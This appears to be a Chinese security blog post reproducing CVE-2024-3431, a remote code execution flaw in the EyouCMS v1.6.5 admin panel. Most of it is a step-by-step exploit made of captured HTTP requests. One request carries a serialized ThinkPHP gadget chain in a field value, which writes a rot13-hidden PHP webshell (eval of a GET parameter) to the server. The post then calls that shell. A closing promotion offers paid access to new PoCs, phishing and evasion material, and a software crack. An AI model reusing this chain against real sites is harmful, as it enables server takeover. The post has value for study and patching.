EYOUCMS v1.6.5 RCE CVE-2024-3431
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请私聊删除。
星球白嫖哥真会操作啊~星球资源白嫖感觉挺好吧!被白嫖哥两次认证过的星球,你还要错过
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
易优cms(eyoucms)是一款专注于企业网站建设的企业建站系统,系统以稳定、安全、易用为宗旨,为用户提供海量企业网站模板,各类实用的eyoucms企业网站插件。
EYOUCMS 1.6.5 后台登录页面 login.php 中的 channel_id 权限升级。
源码地址
官网:https://www.eyoucms.com/源码:https://update.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1.zip
限制 php≥7
影响版本
EYOUCMS v1.6.5
漏洞代码存在位置
进程文件/login.php?m=admin&c=Field&a=channel_edit的组件Backend漏洞分析
0x01 EYOUCMS v1.6.5 RCE
首先,登录后台。
在栏目字段的新增字段;
然后开始数据包捕获,确认并保存,截取一些数据包,并将请求内容中dtype参数修改为region。
POST /login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1Host: 192.168.91.39:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 80Origin: http://192.168.91.39:8088Connection: closeReferer: http://192.168.91.39:8088/login.php?m=admin&c=Field&a=arctype_add&lang=cnCookie: PHPSESSID=ut7s5jpmfe9l0ri63crftsrnq1; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=switch_map%7CIndex; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B1%2C2%2C3%2C4%2C20%2C21%2C22%5D; admin-treeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; admin-arctreeClicked_All=1; referurl=http%3A%2F%2F192.168.91.39%3A8088%2Findex.php%3Fm%3Duser%26c%3DShop%26a%3Dshop_centre; left_menu_2024=12; img_id_upload=; imgname_id_upload=; 34ac354ca3fbaf806e4d213e125f16e2=think%3A%7B%22aid%22%3A%2289%22%2C%22product_num%22%3A%221%22%7D; navigation-treeClicked-Arr=%5B%5Dtitle=poc3&name=poc3&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99
然后点击“编辑”处。
点击确认提交,然后拦截数据包。
修改数据包内容如下,记住channel_id和id的值,在请求体中,可先记录下来。
POST /login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1Host: 192.168.91.39:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 121Origin: http://192.168.91.39:8088Connection: closeReferer: http://192.168.91.39:8088/login.php?m=admin&c=Field&a=arctype_edit&id=577&lang=cnCookie: PHPSESSID=ut7s5jpmfe9l0ri63crftsrnq1; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=switch_map%7CIndex; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B1%2C2%2C3%2C4%2C20%2C21%2C22%5D; admin-treeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; admin-arctreeClicked_All=1; referurl=http%3A%2F%2F192.168.91.39%3A8088%2Findex.php%3Fm%3Duser%26c%3DShop%26a%3Dshop_centre; left_menu_2024=12; img_id_upload=; imgname_id_upload=; 34ac354ca3fbaf806e4d213e125f16e2=think%3A%7B%22aid%22%3A%2289%22%2C%22product_num%22%3A%221%22%7D; navigation-treeClicked-Arr=%5B%5Dtitle=poc3&name=poc3&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=577&old_name=poc3&dtype[]=region
然后点击发送数据包。
最后,发送下面数据包。id和channel_id是为上一步数据包中的值。
GET /login.php?m=admin&c=Field&a=channel_edit&channel_id=-99&id=577&_ajax=1 HTTP/1.1Host: 192.168.91.39:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brX-Requested-With: XMLHttpRequestOrigin: http://192.168.91.39:8088Connection: closeReferer: http://192.168.91.39:8088/login.php?m=admin&c=Field&a=arctype_edit&id=569&lang=cnCookie: PHPSESSID=ut7s5jpmfe9l0ri63crftsrnq1; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=switch_map%7CIndex; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B1%2C2%2C3%2C4%2C20%2C21%2C22%5D; admin-treeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; admin-arctreeClicked_All=1; referurl=http%3A%2F%2F192.168.91.39%3A8088%2Findex.php%3Fm%3Duser%26c%3DShop%26a%3Dshop_centre; left_menu_2024=12; img_id_upload=; imgname_id_upload=; 34ac354ca3fbaf806e4d213e125f16e2=think%3A%7B%22aid%22%3A%2289%22%2C%22product_num%22%3A%221%22%7D; navigation-treeClicked-Arr=%5B%5D;XDEBUG_SESSION=PHPSTORM
返回值为500~
此时页面为
然后访问webshell
http://192.168.91.39:8088/a.php617ac73525b333bea4ac35a717dd8b0a.php?_=phpinfo();最后,如果不想造成恶意等后果,请重新编辑字段默认值,清除Payload,并阻止用户能够正常访问网页。
id和channel_id还先前数据包中的值
POST /login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1Host: 192.168.91.39:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 976Origin: http://192.168.91.39:8088Connection: closeReferer: http://192.168.91.39:8088/login.php?m=admin&c=Field&a=arctype_edit&id=577&lang=cnCookie: PHPSESSID=ut7s5jpmfe9l0ri63crftsrnq1; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=switch_map%7CIndex; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B1%2C2%2C3%2C4%2C20%2C21%2C22%5D; admin-treeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; admin-arctreeClicked_All=1; referurl=http%3A%2F%2F192.168.91.39%3A8088%2Findex.php%3Fm%3Duser%26c%3DShop%26a%3Dshop_centre; left_menu_2024=12; img_id_upload=; imgname_id_upload=; 34ac354ca3fbaf806e4d213e125f16e2=think%3A%7B%22aid%22%3A%2289%22%2C%22product_num%22%3A%221%22%7D; navigation-treeClicked-Arr=%5B%5Dtitle=poc3&name=poc3&old_dtype=region&dfvalue=1&old_dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny(%24_TRG%5B_%5D)%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&remark=&typeids%5B%5D=0&channel_id=-99&id=577&old_name=poc3&dtype=text
往期推荐:
关于我们:
感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。
关注福利:
回复“google工具" 获取 google语法生成工具
回复“小程序渗透工具" 获取 小程序渗透工具
回复“暴力破解字典" 获取 各种常用密码字典打包
回复“typora激活" 获取 最新typora激活程序
回复“蓝队工具箱”即可获取一款专业级应急响应的集成多种工具的工具集
知识星球
星球里有什么?
CNVD、EDU及SRC赏金,攻防演练资源分享(免杀,溯源,钓鱼等),各种新鲜好用工具,最新poc定期更新,以及一些好东西(还在学怎么挖通用漏洞吗快来加入),100多位师傅的选择,16个专栏会持续更新~提前续费有优惠,好用不贵很实惠
交流群
回复"加群"或加我联系方式拉交流群~
安全考证
需要考以下各类安全证书的可以联系我,绝对低价绝对优惠、组团更便宜,报名成功先送星球一年,CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP......巨优惠:
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论